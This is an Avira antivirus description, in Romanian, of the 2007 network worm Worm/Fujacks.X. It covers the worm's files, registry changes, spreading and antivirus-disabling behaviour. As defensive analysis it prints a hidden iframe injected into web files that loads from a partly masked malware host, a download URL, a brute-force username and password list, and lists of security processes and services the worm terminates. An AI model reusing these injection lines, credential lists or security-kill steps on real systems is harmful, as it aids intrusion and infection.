Need help? Ask the community or hire an expert.
Go to Avira Answers
Nume:Worm/Fujacks.X
Descoperit pe data de:09/02/2007
Tip:Vierme
ITW:Da
Numar infectii raportate:Scazut
Potential de raspandire:Mediu
Potential de distrugere:Mediu
Fisier static:Da
Marime:118.272 Bytes
MD5:9d0Ceb2ef643a2f326dfcd8265502ce9
Versiune IVDF:6.37.01.66 - vineri, 9 februarie 2007

 General Metoda de raspandire:
   • Reteaua locala
   • Discuri de retea mapate


Alias:
   •  Mcafee: W32/Fujacks.h
   •  Kaspersky: Worm.Win32.Fujack.a
   •  F-Secure: Worm.Win32.Fujack.a
   •  Sophos: W32/Fujacks-AJ
   •  Panda: W32/Radoppan.I.drp
   •  Grisoft: Worm/Generic.ANX
   •  Eset: Win32/Fujacks
   •  Bitdefender: Win32.Worm.Fujacks.X


Sistem de operare:
   • Windows 95
   • Windows 98
   • Windows 98 SE
   • Windows NT
   • Windows ME
   • Windows 2000
   • Windows XP
   • Windows 2003


Efecte secundare:
   • Inchide aplicatiile de securitate
   • Descarca fisiere
   • Creeaza fisiere
   • Reduce setarile de securitate
   • Modificari in registri

 Fisiere Se copiaza in urmatoarele locatii:
   • %SYSDIR%\drivers\CTFMONT.exe
   • %unitate disc%\setup.exe



Urmatoarelor fisiere le sunt adaugate sectiuni:
– Catre: %toate directoarele%\*.htm Cu urmatorul continut:
   • iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe

– Catre: %toate directoarele%\*.html Cu urmatorul continut:
   • iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe

– Catre: %toate directoarele%\*.asp Cu urmatorul continut:
   • iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe

– Catre: %toate directoarele%\*.php Cu urmatorul continut:
   • iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe

– Catre: %toate directoarele%\*.jsp Cu urmatorul continut:
   • iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe

– Catre: %toate directoarele%\*.asp Cu urmatorul continut:
   • iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe




Sunt create fisierele:

Fisier inofensiv:
   • %SYSDIR%\SVKP.sys

%toate directoarele%\Desktop_.ini Acesta este un fisier text care nu prezinta pericol si are urmatorul continut:
   • %data curenta%

%unitate disc%\autorun.inf Acesta este un fisier text care nu prezinta pericol si are urmatorul continut:
   • %cod care ruleaza fisierul malitios%




Incearca sa descarce un fisier:

Adresa este urmatoarea:
   • http://www.ctv163.com/**********/down.txt
Acest fisier poate contine si alte locatii de descarcare si poate servi ca sursa de noi amenintari.

 Registrii sistemului Urmatoarea cheie este adaugata in registri, in mod repetat, pentru a porni procesul dupa reboot.

  [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
   • svcshare = %SYSDIR%\drivers\CTMONTv.exe



Valorile urmatoarei chei sunt sterse din registrii sistemului:

–  [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
   • RavTask
   • KvMonXP
   • kav
   • KAVPersonal50
   • McAfeeUpdaterUI
   • Network Associates Error Reporting Service
   • ShStatEXE
   • YLive.exe
   • yassistse



Urmatoarea cheie din registri este modificata:

Diverse setari in Explorer:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\
   Folder\Hidden\SHOWALL]
   Vechea valoare:
   • CheckedValue = %setarile utilizatorului%
   Noua valoare:
   • CheckedValue = 0

 Reţea Pentru a-si asigura raspandirea, programul malware incearca sa contacteze alte sisteme, asa cum este descris in continuare:


Foloseste urmatoarele date de logare, pentru a controla sistemul la distanta:

Lista de utilizatori:
   • Administrator
   • Guest
   • admin
   • Root

Lista de parole:
   • 1234; password; 6969; harley; 123456; golf; pussy; mustang; 1111;
      shadow; 1313; fish; 5150; 7777; qwerty; baseball; 2112; letmein;
      12345678; 12345; ccc; admin; 5201314; qq520; 123; 1234567; 123456789;
      654321; 54321; 111; 000000; abc; 11111111; 88888888; pass; passwd;
      database; abcd; abc123; sybase; 123qwe; server; computer; 520; super;
      123asd; ihavenopass; godblessyou; enable; 2002; 2003; 2600; alpha;
      110; 111111; 121212; 123123; 1234qwer; 123abc; 007; aaa; patrick; pat;
      administrator; root; sex; god; fuckyou; fuck; test; test123; temp;
      temp123; win; asdf; pwd; qwer; yxcv; zxcv; home; xxx; owner; login;
      Login; pw123; love; mypc; mypc123; admin123; mypass; mypass123; 901100



Generarea adreselor IP:
Genereaza adrese IP aleatoare, pastrand doar primii trei octeti din propria adresa. Apoi incearca sa contacteze adresele create.


Procesul de infectare:
Fisierul descarcat este salvat pe masina infectata, cu numele: %toate directoarele share%\GameSetup.exe


Reducerea vitezei:
Numarul de infectii declansate: 10
In functie de largimea benzii, puteti observa o cadere in viteza retelei. Acest malware are o activitate medie in retea, pe care e posibil sa nu o remarcati in cazul conectarii broadband.
Este posibila si o usoara incetinire a sistemului, datorita accesarilor multiple in retea.

 Terminarea proceselor Lista cu procesele oprite:
   • Mcshield.exe; VsTskMgr.exe; naPrdMgr.exe; UpdaterUI.exe; TBMon.exe;
      scan32.exe; Ravmond.exe; CCenter.exe; RavTask.exe; Rav.exe;
      Ravmon.exe; RavmonD.exe; RavStub.exe; KVXP.kxp; KvMonXP.kxp;
      KVCenter.kxp; KVSrvXP.exe; KRegEx.exe; UIHost.exe; TrojDie.kxp;
      FrogAgent.exe; Logo1_.exe; Logo_1.exe; Rundl132.exe

Sunt inchise procesele care au titlul ferestri unul din urmatoarele:
   • Symantec AntiVirus
   • Duba
   • Windows
   • esteem procs
   • System Safety Monitor
   • Wrapped gift Killer
   • Winsock Expert


Lista cu serviciile dezactivate:
   • sharedaccess; RsCCenter; RsRavMon; RsCCenter; RsRavMon; KVWSC;
      KVSrvXP; KVWSC; KVSrvXP; AVP; kavsvc; McAfeeFramework; McShield;
      McTaskManager; McAfeeFramework; McShield; McTaskManager; navapsvc;
      wscsvc; KPfwSvc; SNDSrvc; ccProxy; ccEvtMgr; ccSetMgr; SPBBCSvc;
      Symantec Core LC; NPFMntor; MskService; FireSvc

 Alte informatii Metode anti-debugging
Verfica daca exista unul din urmatoarele fisiere:
   • \\.\TRW
   • \\.\SICE
   • \\.\NTICE
   • \\.\FILEVXD
   • \\.\FILEMON
   • \\.\REGVXD
   • \\.\REGMON

Daca gaseste, afiseaza urmatorul mesaj si isi termina executia imediat:


 Detaliile fisierului Limbaj de programare:
Limbaj de programare folosit: Delphi.


Compresia fisierului:
Pentru a ingreuna detectia si a reduce marimea fisierului, este folosit urmatorul program de arhivare:
   • SVKP

Description inserted by Andrei Gherman on Thursday, October 18, 2007
Description updated by Andrei Gherman on Thursday, October 18, 2007

Back . . . .